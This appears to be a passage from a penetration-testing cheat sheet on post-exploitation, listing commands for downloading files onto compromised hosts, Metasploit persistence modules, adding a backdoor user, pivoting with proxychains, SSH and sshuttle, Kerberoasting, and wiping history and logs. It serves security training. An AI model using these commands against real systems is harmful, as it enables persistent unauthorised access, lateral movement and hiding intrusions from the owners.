5. Post Exploitation

File transfers

# HTTP via Python
python3 -m http.server 80

# Windows - Certutil
certutil.exe -urlcache -f <URL-TO-FILE>

# Linux
wget <URL>

...

Maintain access

➡️ Maintaining access during a penetration test refers to the techniques used to retain control over a compromised system for extended periods, even after reboots or security updates. This is a crucial phase in post-exploitation, allowing testers to simulate real-world attacker persistence and assess an organization's ability to detect and respond to such threats.

Metasploit persistence methods

1. Persistence scripts:

   • run persistence -h → Displays available persistence options.

   • exploit/windows/local/persistence → Creates a backdoor using Metasploit.

   • exploit/windows/local/registry_persistence → Modifies Windows Registry for persistence.

2. Scheduled Tasks:

   • run scheduleme → Creates a scheduled task to execute payloads periodically.

   • run schtaskabuse → Abuses schtasks to maintain system access.

3. User Account Manipulation:

   • net user hacker password123 /add → Creates a new user account for persistent access.

These techniques help attackers maintain long-term access even after a system reboot or network disconnection. Monitoring scheduled tasks, registry changes, and unauthorized user accounts is crucial to detecting and preventing persistence mechanisms.

Pivoting

➡️ Pivoting is a technique used in penetration testing to move laterally within a network after compromising an initial system. It allows an attacker to route traffic through the compromised machine to access other internal systems that are otherwise unreachable from the external network.

proxychains

cat /etc/proxychains4.conf
# check socks4 port

ssh -f -N -D 9050 -i pivot <USER>@<VICTIM-IP>

# e.g. pivoting
proxychains nmap -p <PORT> <VICTIM-IP>

proxychains GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip <IP> -request

proxychains xfreerdp /u:administrator /p:'p@ssword' /v:<IP>

proxychains firefox

sshuttle

sshuttle -r <USER>@<IP> <NEW-NETWORK/24> --ssh-cmd "ssh -i pivot"
# keep this terminal open
# run commands in other terminals

chisel

Cleaning up

➡️ The cleanup phase is the final step in a penetration test, ensuring that no traces of testing activities remain on the target system or network.

The goal is to restore the environment to its original state before the test, minimizing security risks and avoiding any disruption.

• Remove files – Delete scripts, executables, and added files

• Eliminate persistence – Remove malware, backdoors, tasks, and added user accounts

• Restore settings – Revert settings, security configs, firewall rules, and permissions.

• Clear tracks – Wipe command history and logs.

📌 From a hacker perspective, you need to "make it look like you were never there".